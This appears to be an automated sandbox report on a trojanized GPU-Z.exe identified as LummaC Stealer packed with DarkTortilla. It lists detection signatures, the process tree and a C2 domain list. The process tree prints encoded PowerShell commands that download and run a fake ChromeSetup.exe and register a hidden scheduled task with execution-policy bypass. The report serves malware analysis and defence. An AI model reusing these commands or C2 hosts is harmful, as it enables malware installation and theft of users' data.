Edit tour
Windows
Analysis Report
GPU-Z.exe
Overview
General Information
| Sample name: | GPU-Z.exe |
| Analysis ID: | 1581997 |
| MD5: | 8a610c8380b7bc7c95472ea19ce2d4f3 |
| SHA1: | 183c6c553dbf468c3867dd094d6cc95a70a404dc |
| SHA256: | 2f01809f78d096e770544c434b5bb63b3a0461559f7dd98a25a04bf66c8784f4 |
| Tags: | exeGPU-ZP2SoftIncsigneduser-NDA0E |
| Infos: |   |
 | |
Detection
LummaC, DarkTortilla, LummaC Stealer
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected LummaC Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Tries to delay execution (extensive OutputDebugStringW loop)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
GPU-Z.exe (PID: 4720 cmdline: "C:\Users\ user\Deskt op\GPU-Z.e xe" MD5: 8A610C8380B7BC7C95472EA19CE2D4F3) 
AddInProcess32.exe (PID: 4760 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C) - AddInProcess32.exe (PID: 3692 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C) - AddInProcess32.exe (PID: 4072 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C) - AddInProcess32.exe (PID: 3920 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C) 
cmd.exe (PID: 3660 cmdline: "cmd" /c p owershell -win 1 -no ni -enc JA BoACAAPQAg ACgARwBlAH QALQBEAGEA dABlACkALg BoAG8AdQBy ADsAIAAkAG 0AIAA9ACAA KABHAGUAdA AtAEQAYQB0 AGUAKQAuAE EAZABkAE0A aQBuAHUAdA BlAHMAKAAy ACkALgBtAG kAbgB1AHQA ZQA7ACAAJA BUAHIAaQBn AGcAZQByAC AAPQAgAE4A ZQB3AC0AUw BjAGgAZQBk AHUAbABlAG QAVABhAHMA awBUAHIAaQ BnAGcAZQBy ACAALQBPAG 4AYwBlACAA LQBBAHQAIA AiACQAaABg ADoAJABtAC IAOwAgACQA QQBjAHQAaQ BvAG4AIAA9 ACAATgBlAH cALQBTAGMA aABlAGQAdQ BsAGUAZABU AGEAcwBrAE EAYwB0AGkA bwBuACAALQ BFAHgAZQBj AHUAdABlAC AAIgBjAG0A ZAAiACAALQ BBAHIAZwB1 AG0AZQBuAH QAIAAiAC8A YwAgAHAAbw B3AGUAcgBz AGgAZQBsAG wAIAAtAHcA aQBuACAAMQ AgAC0AbgBv AG4AaQAgAC 0AZQBwACAA YgB5AHAAYQ BzAHMAIAAt AGYAaQBsAG UAIAAkAGUA bgB2ADoAVQ BTAEUAUgBQ AFIATwBGAE kATABFAFwA QQBwAHAARA BhAHQAYQBc AEwAbwBjAG EAbABcAE0A ZQBkAGkAYQ BTAHQAbwBy AGEAZwBlAF wAdQBwAGQA YQB0AGUALg BwAHMAMQAi ADsAIAAkAF AAcgBpAG4A YwBpAHAAYQ BsACAAPQAg AE4AZQB3AC 0AUwBjAGgA ZQBkAHUAbA BlAGQAVABh AHMAawBQAH IAaQBuAGMA aQBwAGEAbA AgAC0AVQBz AGUAcgBJAG QAIAAkAEUA bgB2ADoAVQ BzAGUAcgBO AGEAbQBlAD sAIABSAGUA ZwBpAHMAdA BlAHIALQBT AGMAaABlAG QAdQBsAGUA ZABUAGEAcw BrACAALQBU AGEAcwBrAE 4AYQBtAGUA IAAiAE0AZQ BkAGkAYQBV AHAAZABhAH QAZQAiACAA LQBUAHIAaQ BnAGcAZQBy ACAAJABUAH IAaQBnAGcA ZQByACAALQ BBAGMAdABp AG8AbgAgAC QAQQBjAHQA aQBvAG4AIA AtAFAAcgBp AG4AYwBpAH AAYQBsACAA JABQAHIAaQ BuAGMAaQBw AGEAbAA= MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3788 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 3840 cmdline: powershell -win 1 -n oni -enc J ABoACAAPQA gACgARwBlA HQALQBEAGE AdABlACkAL gBoAG8AdQB yADsAIAAkA G0AIAA9ACA AKABHAGUAd AAtAEQAYQB 0AGUAKQAuA EEAZABkAE0 AaQBuAHUAd ABlAHMAKAA yACkALgBtA GkAbgB1AHQ AZQA7ACAAJ ABUAHIAaQB nAGcAZQByA CAAPQAgAE4 AZQB3AC0AU wBjAGgAZQB kAHUAbABlA GQAVABhAHM AawBUAHIAa QBnAGcAZQB yACAALQBPA G4AYwBlACA ALQBBAHQAI AAiACQAaAB gADoAJABtA CIAOwAgACQ AQQBjAHQAa QBvAG4AIAA 9ACAATgBlA HcALQBTAGM AaABlAGQAd QBsAGUAZAB UAGEAcwBrA EEAYwB0AGk AbwBuACAAL QBFAHgAZQB jAHUAdABlA CAAIgBjAG0 AZAAiACAAL QBBAHIAZwB 1AG0AZQBuA HQAIAAiAC8 AYwAgAHAAb wB3AGUAcgB zAGgAZQBsA GwAIAAtAHc AaQBuACAAM QAgAC0AbgB vAG4AaQAgA C0AZQBwACA AYgB5AHAAY QBzAHMAIAA tAGYAaQBsA GUAIAAkAGU AbgB2ADoAV QBTAEUAUgB QAFIATwBGA EkATABFAFw AQQBwAHAAR ABhAHQAYQB cAEwAbwBjA GEAbABcAE0 AZQBkAGkAY QBTAHQAbwB yAGEAZwBlA FwAdQBwAGQ AYQB0AGUAL gBwAHMAMQA iADsAIAAkA FAAcgBpAG4 AYwBpAHAAY QBsACAAPQA gAE4AZQB3A C0AUwBjAGg AZQBkAHUAb ABlAGQAVAB hAHMAawBQA HIAaQBuAGM AaQBwAGEAb AAgAC0AVQB zAGUAcgBJA GQAIAAkAEU AbgB2ADoAV QBzAGUAcgB OAGEAbQBlA DsAIABSAGU AZwBpAHMAd ABlAHIALQB TAGMAaABlA GQAdQBsAGU AZABUAGEAc wBrACAALQB UAGEAcwBrA E4AYQBtAGU AIAAiAE0AZ QBkAGkAYQB VAHAAZABhA HQAZQAiACA ALQBUAHIAa QBnAGcAZQB yACAAJABUA HIAaQBnAGc AZQByACAAL QBBAGMAdAB pAG8AbgAgA CQAQQBjAHQ AaQBvAG4AI AAtAFAAcgB pAG4AYwBpA HAAYQBsACA AJABQAHIAa QBuAGMAaQB wAGEAbAA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - cmd.exe (PID: 6972 cmdline:
"cmd" /c p owershell -win 1 -no ni -enc SQ BuAHYAbwBr AGUALQBXAG UAYgBSAGUA cQB1AGUAcw B0ACAALQBV AHIAaQAgAC IAaAB0AHQA cABzADoALw AvAGMAaABy AG8AbQBlAC 0AYgByAG8A dwBzAGUAcg AtAGQAbwB3 AG4AbABvAG EAZAAuAGMA bwBtAC8AQw BoAHIAbwBt AGUAUwBlAH QAdQBwAC4A ZQB4AGUAIg AgAC0ATwB1 AHQARgBpAG wAZQAgACIA JABlAG4Adg A6AFQARQBN AFAAXABDAG gAcgBvAG0A ZQBTAGUAdA B1AHAALgBl AHgAZQAiAD sAIABTAHQA YQByAHQALQ BQAHIAbwBj AGUAcwBzAC AAIgAkAGUA bgB2ADoAVA BFAE0AUABc AEMAaAByAG 8AbQBlAFMA ZQB0AHUAcA AuAGUAeABl ACIA MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6704 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4124 cmdline:
powershell -win 1 -n oni -enc S QBuAHYAbwB rAGUALQBXA GUAYgBSAGU AcQB1AGUAc wB0ACAALQB VAHIAaQAgA CIAaAB0AHQ AcABzADoAL wAvAGMAaAB yAG8AbQBlA C0AYgByAG8 AdwBzAGUAc gAtAGQAbwB 3AG4AbABvA GEAZAAuAGM AbwBtAC8AQ wBoAHIAbwB tAGUAUwBlA HQAdQBwAC4 AZQB4AGUAI gAgAC0ATwB 1AHQARgBpA GwAZQAgACI AJABlAG4Ad gA6AFQARQB NAFAAXABDA GgAcgBvAG0 AZQBTAGUAd AB1AHAALgB lAHgAZQAiA DsAIABTAHQ AYQByAHQAL QBQAHIAbwB jAGUAcwBzA CAAIgAkAGU AbgB2ADoAV ABFAE0AUAB cAEMAaAByA G8AbQBlAFM AZQB0AHUAc AAuAGUAeAB lACIA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
ChromeSetup.exe (PID: 4304 cmdline: "C:\Users\ user\AppDa ta\Local\T emp\Chrome Setup.exe" MD5: 6DF42D2EACF5B2916299DDC1AF4A7DDF) - updater.exe (PID: 6048 cmdline:
"C:\Window s\SystemTe mp\Google4 304_299551 820\bin\up dater.exe" --install =appguid={ 8A69D345-D 564-463C-A FF1-A69D9E 530F96}&ii d={8E7848E A-F143-48B 2-373C-33F 54B7527D1} &lang=en-G B&browser= 3&usagesta ts=1&appna me=Google% 20Chrome&n eedsadmin= prefers&ap =x64-stats def_1&inst alldataind ex=empty - -enable-lo gging --vm odule=*/co mponents/w inhttp/*=1 ,*/compone nts/update _client/*= 2,*/chrome /enterpris e_companio n/*=2,*/ch rome/updat er/*=2 MD5: 9DB9D09B6A58E5C09773F754504AC148) - updater.exe (PID: 2608 cmdline:
C:\Windows \SystemTem p\Google43 04_2995518 20\bin\upd ater.exe - -crash-han dler --sys tem "--dat abase=C:\P rogram Fil es (x86)\G oogle\Goog leUpdater\ 132.0.6833 .0\Crashpa d" --url=h ttps://cli ents2.goog le.com/cr/ report --a nnotation= prod=Updat e4 --annot ation=ver= 132.0.6833 .0 "--atta chment=C:\ Program Fi les (x86)\ Google\Goo gleUpdater \updater.l og" --init ial-client -data=0x27 8,0x27c,0x 280,0x254, 0x284,0xbc 9488,0xbc9 494,0xbc94 a0 MD5: 9DB9D09B6A58E5C09773F754504AC148)
- svchost.exe (PID: 4508 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cmd.exe (PID: 2520 cmdline:
C:\Windows \system32\ cmd.EXE /c powershel l -win 1 - noni -ep b ypass -fil e C:\Users \user\AppD ata\Local\ MediaStora ge\update. ps1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6148 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5588 cmdline:
powershell -win 1 -n oni -ep by pass -file C:\Users\ user\AppDa ta\Local\M ediaStorag e\update.p s1 MD5: 04029E121A0CFA5991749937DD22A1D9)
chrome.exe (PID: 6340 cmdline: "C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://s upport.goo gle.com/in staller/?p roduct=&er ror=75035 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 6492 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2096 --fi eld-trial- handle=202 8,i,821860 8324562589 918,130396 1621844276 9122,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 4416 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://s upport.goo gle.com/in staller/?p roduct=&er ror=75035 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 1776 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2092 --fi eld-trial- handle=202 4,i,803333 9409621329 4,69153740 6094068908 9,262144 - -disable-f eatures=Op timization GuideModel Downloadin g,Optimiza tionHints, Optimizati onHintsFet ching,Opti mizationTa rgetPredic tion /pref etch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 6200 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t http://s upport.goo gle.com/in staller/?p roduct=&er ror=75035 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 892 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2160 --fi eld-trial- handle=200 0,i,581022 2806604600 449,139195 5646674968 393,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| DarkTortilla | DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021. | No Attribution |
{"C2 url": ["energyaffai.lat", "grannyejh.lat", "aspecteirs.lat", "necklacebudi.lat", "crosshuaht.lat", "sustainskelet.lat", "discokeyus.lat", "rapeflowwj.lat"], "Build id": "bFcGh6--1912"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security | ||
| JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security | ||
| JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security | ||
| JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security | ||
| JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security | ||
| Click to see the 5 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security | ||
| JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security | ||
| JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security | ||
| JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security | ||
| JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security | ||
| Click to see the 4 entries | ||||
System Summary |   |
|---|
| Source: | Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: | ||
| Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: | ||